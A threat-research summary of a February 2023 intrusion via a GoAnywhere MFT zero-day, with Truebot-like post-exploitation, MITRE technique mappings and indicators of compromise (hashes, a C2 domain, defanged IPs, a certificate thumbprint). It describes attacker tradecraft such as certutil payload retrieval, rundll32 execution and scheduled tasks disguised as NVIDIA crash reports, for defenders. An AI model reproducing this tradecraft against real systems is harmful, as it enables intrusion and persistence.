Threat Research

Investigating Intrusions From Intriguing Exploits

Securonix

Huntress linked a February 2023 GoAnywhere MFT-related intrusion to a zero-day vulnerability and a Truebot-like post-exploitation activity, leading to a mitigation before a ransomware event could unfold. The effort highlighted how certutil and rundll32 were used with scheduled tasks for persistence, backed by a C2 domain and specific IOCs. #Truebot #Silence #TA505 #GoAnywhereMFT #NvTmRep #Tomcat

Keypoints

  • Two alerts on 02 February 2023 showed certutil downloading a file and follow-on scheduled task creation, pointing to a larger intrusion linked to GoAnywhere MFT.
  • The downloaded file appeared as gamft.dll; execution used rundll32.exe and a uniquely named export, suggesting a Truebot-like payload.
  • Scheduled tasks named NvTmRep_CrashReport… were used for persistence and masked as legitimate NVIDIA crash-report tasks.
  • Attack activity occurred under the GoAnywhereSvcAcct account with a Tomcat-based web server, indicating a server compromise tied to GoAnywhere MFT.
  • Open-source analysis connected the activity to a GoAnywhere MFT zero-day vulnerability and a broader Truebot/Silence/TA505 ecosystem; a patch followed on 07 February 2023.
  • Artifact analysis identified binaries and C2 infrastructure (qweastradoc[.]com) with hashes like gamft.dll, corroborating a Truebot lineage.
  • Defensive guidance emphasizes early post-exploitation monitoring and minimizing exposed services to detect and defeat intrusions.

MITRE Techniques

  • [T1190] Exploit Public Facing Application – Adversary gained initial access via exploit of GoAnywhere MFT service. “Adversary gained initial access via exploit of GoAnywhere MFT service.”
  • [T1203] Exploitation for Client Execution – Adversary gained code execution capability through exploit of GoAnywhere MFT service. “Adversary gained code execution capability through exploit of GoAnywhere MFT service.”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Adversary created scheduled tasks for persistence purposes. “Adversary created scheduled tasks for persistence purposes.”
  • [T1036.004] Masquerading: Masquerade Task or Service – Adversary used file naming conventions to impersonate legitimate-looking processes and files. “Adversary used file naming conventions to impersonate legitimate-looking processes and files.”
  • [T1553.002] Subvert Trust Controls: Code Signing – Adversary used a valid code signing certificate for Truebot payload. “Adversary used a valid code signing certificate for Truebot payload.”
  • [T1078.003] Local Accounts – Adversary used account associated with exploited process for subsequent actions. “Adversary used account associated with exploited process for subsequent actions.”
  • [T1140] Deobfuscate/Decode Files of Information – Adversary used certutil to decode an encoded Truebot payload. “Adversary used certutil to decode an encoded Truebot payload.”
  • [T1218.011] System Binary Proxy Execution: Rundll32 – Adversary used Rundll32 to attempt execution of Truebot payload. “Adversary used Rundll32 to attempt execution of Truebot payload.”
  • [T1071.001] Application Layer Protocol: Web Protocols – Truebot payload C2 communications performed over HTTP. “Truebot payload C2 communications performed over HTTP.”
  • [T1105] Ingress Tool Transfer – Adversary attempted to retrieve and build Truebot payload via certutil. “Adversary attempted to retrieve and build Truebot payload via certutil.”
  • [T1571] Non-Standard Port – Adversary used HTTP over a non-standard port for Truebot payload retrieval. “Adversary used HTTP over a non-standard port for Truebot payload retrieval.”
  • [T1132.001] Data Encoding: Standard Encoding – Adversary encoded Truebot payload for standard decoding via certutil. “Adversary encoded Truebot payload for standard decoding via certutil.”

Indicators of Compromise

  • [SHA256] Host indicators – c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c, 0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3, and 1 more hash (c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d)
  • [File Name] Host indicators – gamft.dll, larabqFa.exe, and 1 more file (Pxaz.dll)
  • [Domain] Network indicators – qweastradoc[.]com
  • [IP] Network indicators – 5.188.206[.]76, 92.118.36[.]213
  • [Certificate] Host indicators – Thumbprint 8DCCF6AD21A58226521E36D7E5DBAD133331C181, Serial Number 00-82-D2-24-32-3E-FA-65-06-0B-64-1F-51-FA-DF-EF-02

Read more: https://www.huntress.com/blog/investigating-intriguing-exploits

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint